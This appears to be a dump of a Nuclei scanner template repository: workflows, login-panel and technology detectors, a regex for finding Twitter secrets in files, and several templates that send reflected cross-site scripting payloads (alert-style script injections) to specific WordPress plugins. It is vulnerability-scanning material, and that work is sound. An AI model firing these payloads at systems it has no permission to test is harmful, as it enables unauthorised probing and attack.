cyllective,daffainfo,idealphase 6 | severity: info 7 | description: Open source Node.js Headless CMS to easily build customisable APIs 8 | reference: 9 | - https://github.com/strapi/strapi 10 | tags: tech,strapi,cms 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin/init" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"data"' 23 | - '"uuid"' 24 | - '"hasAdmin"' 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | group: 1 35 | regex: 36 | - '"strapiVersion":"([0-9.]+)"' 37 | -------------------------------------------------------------------------------- /subrion-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: subrion-workflow 2 | 3 | info: 4 | name: Subrion CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Subrion CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: subrion 12 | subtemplates: 13 | - tags: subrion -------------------------------------------------------------------------------- /sugarcrm-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sugarcrm-workflow 2 | 3 | info: 4 | name: SugarCRM Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SugarCRM related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sugarcrm 12 | subtemplates: 13 | - tags: sugarcrm -------------------------------------------------------------------------------- /symfony-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-workflow 2 | info: 3 | name: Symfony Security Checks 4 | author: daffainfo 5 | description: A simple workflow that runs all Symfony related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/tech-detect.yaml 9 | matchers: 10 | - name: symfony 11 | subtemplates: 12 | - tags: symfony -------------------------------------------------------------------------------- /tapestry-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tapestry-workflow 2 | 3 | info: 4 | name: Apache Tapestry Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Tapestry related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/apache/apache-tapestry-detect.yaml 10 | subtemplates: 11 | - tags: tapestry 12 | -------------------------------------------------------------------------------- /terramaster-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: terramaster-workflow 2 | 3 | info: 4 | name: TerraMaster Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TerraMaster related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/terramaster-login.yaml 10 | subtemplates: 11 | - tags: terramaster 12 | -------------------------------------------------------------------------------- /thinfinity-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinfinity-workflow 2 | 3 | info: 4 | name: Thinfinity VirtualUI Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Thinfinity VirtualUI related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/thinfinity-virtualui-panel.yaml 10 | subtemplates: 11 | - tags: thinfinity 12 | -------------------------------------------------------------------------------- /thinkadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkadmin-workflow 2 | 3 | info: 4 | name: ThinkAdmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ThinkAdmin related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: thinkadmin 12 | subtemplates: 13 | - tags: thinkadmin -------------------------------------------------------------------------------- /thinkcmf-detect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-detection 2 | 3 | info: 4 | name: Detect ThinkCMF 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | tags: panel,thinkcmf,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - '' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /thruk-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thruk-workflow 2 | 3 | info: 4 | name: Thruk Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Thruk related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/thruk-login.yaml 10 | subtemplates: 11 | - tags: thruk 12 | -------------------------------------------------------------------------------- /tikiwiki-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tikiwiki-workflow 2 | 3 | info: 4 | name: Tiki Wiki Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Tiki Wiki related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/tikiwiki-cms.yaml 10 | subtemplates: 11 | - tags: tikiwiki 12 | -------------------------------------------------------------------------------- /tongda-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tongda-workflow 2 | 3 | info: 4 | name: TongDa Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TongDa related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: tongda 12 | subtemplates: 13 | - tags: tongda 14 | -------------------------------------------------------------------------------- /tpshop-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tpshop-workflow 2 | 3 | info: 4 | name: TPshop Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TPshop related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: tpshop 12 | subtemplates: 13 | - tags: tpshop 14 | -------------------------------------------------------------------------------- /traefik-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: traefik-workflow 2 | 3 | info: 4 | name: Traefik Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Traefik related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/traefik-dashboard.yaml 10 | subtemplates: 11 | - tags: traefik 12 | -------------------------------------------------------------------------------- /twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang,daffainfo 6 | severity: medium 7 | tags: token,file,twitter 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" 17 | - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" -------------------------------------------------------------------------------- /umbraco-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: umbraco-workflow 2 | 3 | info: 4 | name: Umbraco Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Umbraco related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: umbraco 12 | subtemplates: 13 | - tags: umbraco -------------------------------------------------------------------------------- /vmware-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-workflow 2 | 3 | info: 4 | name: VMware Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/vmware/vmware-detect.yaml 10 | subtemplates: 11 | - tags: vmware 12 | -------------------------------------------------------------------------------- /voipmonitor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: voipmonitor-workflow 2 | 3 | info: 4 | name: VoipMonitor Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/voipmonitor-panel.yaml 10 | subtemplates: 11 | - tags: voipmonitor 12 | -------------------------------------------------------------------------------- /wazuh-panel.yaml: -------------------------------------------------------------------------------- 1 | id: wazuh-panel 2 | 3 | info: 4 | name: Wazuh Login Panel 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: Wazuh - The Open Source Security Platform 8 | reference: 9 | - https://github.com/wazuh/wazuh 10 | metadata: 11 | shodan-query: http.title:"Wazuh" 12 | tags: panel,wazuh,login 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/app/login" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":"wazuh"' 25 | - '"title":"Wazuh"' 26 | - '"icon":"plugins/wazuh/img/icon_blue.png"' 27 | - '"url":"/app/wazuh"' 28 | condition: or 29 | 30 | - type: status 31 | status: 32 | - 200 33 | 34 | extractors: 35 | - type: regex 36 | part: body 37 | group: 1 38 | regex: 39 | - '"version":"([0-9.]+)"' -------------------------------------------------------------------------------- /webmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: webmin-workflow 2 | 3 | info: 4 | name: Webmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Webmin related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/webmin-panel.yaml 10 | subtemplates: 11 | - tags: webmin 12 | -------------------------------------------------------------------------------- /webmodule-ee-panel.yaml: -------------------------------------------------------------------------------- 1 | id: webmodule-ee-panel 2 | 3 | info: 4 | name: Webmodule Login Panel 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/7001 9 | metadata: 10 | google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" 11 | tags: panel,webmodule-ee,login 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/webmodule-ee/login.seam" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "Webmodule" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | extractors: 29 | - type: regex 30 | part: body 31 | group: 1 32 | regex: 33 | - 'Version: ([0-9.]+)' -------------------------------------------------------------------------------- /websvn-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: websvn-workflow 2 | 3 | info: 4 | name: Websvn Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Websvn related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: websvn 12 | subtemplates: 13 | - tags: websvn -------------------------------------------------------------------------------- /wp-ambience-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-ambience-xss 2 | 3 | info: 4 | name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/exploits/38568 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-church-admin-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-church-admin-xss 2 | 3 | info: 4 | name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-custom-tables-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-custom-tables-xss 2 | 3 | info: 4 | name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability 8 | reference: 9 | - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 10 | tags: wordpress,xss,wp-plugin 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "" 22 | part: body 23 | 24 | - type: word 25 | part: header 26 | words: 27 | - text/html 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /wp-finder-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-finder-xss 2 | 3 | info: 4 | name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-flagem-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-flagem-xss 2 | 3 | info: 4 | name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/exploits/38674 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-knews-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-knews-xss 2 | 3 | info: 4 | name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-nextgen-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-nextgen-xss 2 | 3 | info: 4 | name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-phpfreechat-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-phpfreechat-xss 2 | 3 | info: 4 | name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-securimage-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-securimage-xss 2 | 3 | info: 4 | name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-socialfit-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-socialfit-xss 2 | 3 | info: 4 | name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting 5 | author: daffainfo 6 | severity: medium 7 | description: | 8 | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 9 | reference: 10 | - https://www.exploit-db.com/exploits/37481 11 | tags: wordpress,xss,wp-plugin 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '' 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /wuzhicms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: wuzhicms-workflow 2 | 3 | info: 4 | name: Wuzhicms Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Wuzhicms related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/wuzhicms-detect.yaml 10 | subtemplates: 11 | - tags: wuzhicms 12 | -------------------------------------------------------------------------------- /xdcms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xdcms-workflow 2 | 3 | info: 4 | name: XdCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all XdCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: xdcms 12 | subtemplates: 13 | - tags: xdcms -------------------------------------------------------------------------------- /xiuno-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xiuno-workflow 2 | 3 | info: 4 | name: Xiuno Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Xiuno related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: xiuno 12 | subtemplates: 13 | - tags: xiuno -------------------------------------------------------------------------------- /xxljob-panel.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-panel 2 | 3 | info: 4 | name: XXLJOB Admin Login Panel 5 | author: pdteam,daffainfo 6 | severity: info 7 | tags: panel,xxljob,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | 25 | extractors: 26 | - type: regex 27 | part: body 28 | group: 1 29 | regex: 30 | - '"admin_version":"(.*?)"' 31 | -------------------------------------------------------------------------------- /xxljob-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-workflow 2 | 3 | info: 4 | name: XXL-JOB Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/xxljob-panel.yaml 10 | subtemplates: 11 | - template: default-logins/xxljob/xxljob-default-login.yaml 12 | -------------------------------------------------------------------------------- /yapi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: yapi-workflow 2 | 3 | info: 4 | name: YApi Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all YApi related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: yapi 12 | subtemplates: 13 | - tags: yapi -------------------------------------------------------------------------------- /yii-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: yii-workflow 2 | 3 | info: 4 | name: Yii Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Yii related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: yii 12 | subtemplates: 13 | - tags: yii -------------------------------------------------------------------------------- /yzmcms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: yzmcms-panel 2 | 3 | info: 4 | name: YzmCMS Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"YzmCMS" 9 | tags: panel,yzmcms,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/admin/index/login.html' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Powered By